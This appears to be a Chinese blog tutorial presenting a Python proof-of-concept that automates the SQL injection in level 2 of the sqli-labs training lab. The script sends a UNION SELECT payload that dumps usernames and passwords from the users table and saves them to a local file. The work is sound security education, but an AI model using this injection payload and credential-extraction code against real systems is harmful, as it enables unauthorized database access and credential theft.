当前位置: 首页 > article >正文

sqli-labs靶场自动化利用工具——第2关

文章目录

  • 概要
  • 整体架构流程
  • 技术细节
  • 执行效果
  • 小结

概要

Sqli-Labs靶场对于网安专业的学生或正在学习网安的朋友来说并不陌生,或者说已经很熟悉。那有没有朋友想过自己开发一个测试脚本能实现自动化化测试sqli-labs呢?可能有些人会说不是有sqlmap,那我们又何须使用这个小脚本呢?这里我统一回答,sqlmap只是一个工具,工具始终是不能代替人的思考。开发这个测试的脚本他都是有针对性的,他是针对每一关的精心设计。但凡脱离实际都是在空想。我也是一直围绕这个主题,所以想到了开发能自动化测试sqli-labs靶场每一关的POC。最后这个只能用于有基础的网安人进行学习,学习网安路还是不能投机取巧的。

本章适合人群:

  1. 网安专业学生
  2. 报班学习网安内容的同学
  3. 提高写POC能力的网安从业者

整体架构流程

因为是sqli-labs的第2关,且我觉得名字很是麻烦,所以我在写脚本的时候错将sqli-labs写成了sql-libs请见谅。如果你有强迫症可以自行修改。

整体流程主要是仿爬虫的形式访问网页,之后将得到的数据记录在和py文件同一级的目录下面。

且第二关的sqli-labs和第一关的区别主要在于参数后面的符号,其他都是类似的。

技术细节

import re
import requests
import os
print("当前工作目录:", os.getcwd())


def send_request(url):
    headers = {
        'Host': 'sql:8081',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8',
        'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'Accept-Encoding': 'gzip, deflate',
        'Connection': 'close',
        'Upgrade-Insecure-Requests': '1',
        'Priority': 'u=0, i'
    }
    params = {
        'id': "-1 union select 1,2,group_concat(username,0x3a,password) from users"
    }
    try:
        response = requests.get(url + "/Less-2/", headers=headers, params=params, verify=False)
        if response.status_code == 200:
            print(f'{url} 存在漏洞.')
            html_content = response.text
            pattern = r'Your Password:(.*?)</font>'
            credentials = re.findall(pattern, html_content, re.DOTALL)
            if credentials:
                pairs = credentials[0].split(',')
                file_path = os.path.join(os.getcwd(), 'credentials.txt')
                with open(file_path, 'w') as f:
                    for pair in pairs:
                        username, password = pair.split(':')
                        # 写入用户名和密码到文件
                        f.write(f'Username: {username.strip()}, Password: {password.strip()}\n')
            print('Credentials have been extracted and saved to credentials.txt.')
        else:
            print(f'{url} no.')
    except requests.RequestException as e:
        print(f'Error scanning {url}: {e}')


send_request('http://sql:8081')

执行效果

小结

由于我的sqli-labs靶场是搭建在我的本机,所以使用代码时需要进行修改。

且想输出不一样的文件内容格式,也可以进行微调整。

最后还是那句话网安的路上不会一帆风顺,还需脚踏实地一步一个脚印的前行,仅用于POC的学习使用,其他使用与作者无关。


http://www.kler.cn/news/309263.html

相关文章:

  • C++系列-STL中find相关的算法
  • 联合仿真(FMI,FMU)资料收集
  • 【mysql】逻辑运算符
  • QT实现TCP协议
  • 『功能项目』第二职业法师的平A【57】
  • nlohmann::json中有中文时调用dump转string抛出异常的问题
  • C++:类和对象全解
  • 【C++】日期类基础题
  • 笔记整理—内核!启动!—kernel部分(6)buxybox详解
  • 视觉检测中的深度学习应用
  • vue3 ref的用法及click事件的说明
  • 使用 uni-app 开发微信小程序的详细指南
  • go mod文件为啥又两个require
  • C#使用TCP-S7协议读写西门子PLC(四)
  • Qt常用控件——QDateTimeEdit
  • 【华为OD】2024D卷——生成哈夫曼树
  • CAD图纸加密软件哪个好?10款2024主流CAD图纸加密软件分享!
  • 如何利用Samba跨平台分享Ubuntu文件夹
  • 电路设计学习(一)
  • 【Day14-单例设计模式动态代理】
  • 一文吃透JVM面试八股文
  • 每日学习一个数据结构-DFA确定有限状态机
  • 【linux】VisiData:强大的命令行数据处理工具
  • 跟李沐学AI:序列到序列seq2seq
  • 本地部署大模型并使用知识库Windows下Ollama+Docker+MaxKB安装的记录
  • 影刀RPE学习——自动化
  • 地大信息-基础信息平台 GetImg 任意文件读取漏洞复现
  • http和https分别是什么?区别是什么?
  • GO GIN SSE DEMO
  • Springboot项目打war包运行及错误解决